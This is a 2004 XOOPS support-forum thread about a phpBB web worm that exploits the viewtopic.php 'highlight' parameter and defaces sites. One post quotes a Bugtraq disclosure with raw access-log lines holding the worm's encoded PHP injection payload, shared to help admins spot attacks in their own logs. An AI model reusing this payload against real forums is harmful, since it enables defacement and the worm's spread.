1
Stewdio
Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 17:26

  • Stewdio

  • Community Support Member

  • Posts: 1560

  • Since: 2003/5/7 1


"A Web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday."

Get the full scoop here

[size=x-small]Source: ZDNet.com[/size]

phpBB.com has also made a posting on their forums regarding this issue.

----

On a side note, it is not known whether or not this worm will affect XOOPS mods using the phpBB code. As such, you are cautioned to check the main phpBB website for further details. You may also want to check out Koudanshi's website for further information if he has any available as he is the main person working on IPB and phpBB mods for XOOPS. (My information could be out of date)

Also, it appears that this is an issue with php coding and will affect sites running on php 4.3.10 or earlier. If your host has not upgraded their version of PHP then you should contact them about performing an upgrade.

This is purely for informational purposes only. I lack the resources and knowledge of the language to provide further details. I am sure many of you here will be more then qualified to substantiate and elaborate more on this.

2
Catzwolf
Re: Attn: phpBB users - php 4.3.10 Exploit found
  • 2004/12/22 17:41

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


I can confirm that this worm can affect a XOOPS website with newbb installed. gameinatrix has been hacked for the second day running and I am still trying to find the source of the 'hole'.

Has anyone else been attacked recently?

If you have can you give details of your XOOPS version, forum version etc please.

ATB

Catz

3
Herko
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 18:49

  • Herko

  • XOOPS is my life!

  • Posts: 4238

  • Since: 2002/2/4 1


PHP 4.3.10?? I thought 4.3.10 was the patch that closed this hole??

*edit*
If you're using shared hosting with weak permissions another site on the same server could be the cause. The key would be to check the server logs for gameinatrix.com and see if there have been any odd requests to viewthread.php, which is what this net-worm is looking for. (thanks Ackbarr for this info!)

Herko

4
Anonymous
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 18:52

  • Anonymous

  • Posts: 0

  • Since:


The forum of the very important magazine in Slovenia is DOWN!!! Beacuse of this worm ... check here: http://www.pcformatslo.net/forum/

And can the worm attack NewBB 2.0 Final ?

5
m0nty
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 18:53

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


it is herko :) i think it was just a mix up with wording.. think stewdio means php 4.3.9 or below..

well i hope so or we're all gonna be sufferin soon..

6
Herko
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 18:56

  • Herko

  • XOOPS is my life!

  • Posts: 4238

  • Since: 2002/2/4 1


Quote:

m0nty wrote:
it is herko :) i think it was just a mix up with wording.. think stewdio means php 4.3.9 or below..

Ackbarr tells me they're separate issues, the patch for 4.3.10 doesn't close this hole... He also looked into newbb 2, and hasn't found a vulnerability for this worm, but that's not guarantee.

*edit*
Ackbarr says this phpbb worm is actually due to a whole in their text parsing of a specific parameter to viewthread.php.

Herko

7
m0nty
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 19:03

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


ahh ok :) cheers for the info.. looks like it's gonna be an entertaining xmas..

but i'm glad newbb 2 looks to be safe somewhat..

8
Catzwolf
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 19:03

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


@Herko:

The server updated to version 4.3.10 today and they where still hacked.

I spent all day yesterday looking throu the server logs and came across nothing that might actually point to a direct attempt, but I will check the logs for today and see if that picks anything up.

the where using a RC version of the newbb 2 forum and I have just upgraded that to the latest release.

ATB

Catz

9
ackbarr
Re: Attn: phpBB users - php 4.3.10 Exploit found

Catz - the worm in question traverses the entire server's filesystem looking for files to infect. So all it would take is some weak permissions on the virtual sites and another site on the same server to be infected.

To quote the disclosure post on bugtrack:

Quote:

This morning one of our client's sites was found to have been defaced with the words "NeverEverNoSanity WebWorm Generation 9." The defacement appeared to take place on all .html files in the web root trees of multiple virtual hosts on the web server in a very short period of time.

After some investigation, we determined that the attacker had gained access via phpbb in a series of crafted URL requests, like so:

64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252
echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)
),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr
(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)
%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%25
2ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE OMITTED.com/
viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%25
2Efw
rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech
r(11
1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252ech
r(11
5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47
)%25
2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%2
52ec
hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

After checking the phpbb site, it turns out that this is a vulnerability posted the 18th of November, called Hilight; we didn't update to prevent it because the client whose domain it was has their own admin, and we thought he was taking care of phpBB. Oops. The exploit is described here:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

When I copied all these entries out of the log and translated the chr() calls, they turned out to be the attached perl script, which is capable of finding .html files to deface, and then going to google and finding more instances of phpbb to infect. Which makes it a worm. It also tracks itself by generation; we were generation 9.

Please find attached the above-mentioned script as well as the series of log entries from access_log.


Basically - look through that site's access logs and see if there were any nasty looking requests for viewtopic.php

10
Anonymous
Re: Attn: phpBB/IPB (etc) users - php 4.3.10 Exploit found
  • 2004/12/22 19:06

  • Anonymous

  • Posts: 0

  • Since:


I trust you ackbarr ... Resized Image

Login

Who's Online

414 user(s) are online (292 user(s) are browsing Support Forums)


Members: 0


Guests: 414


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits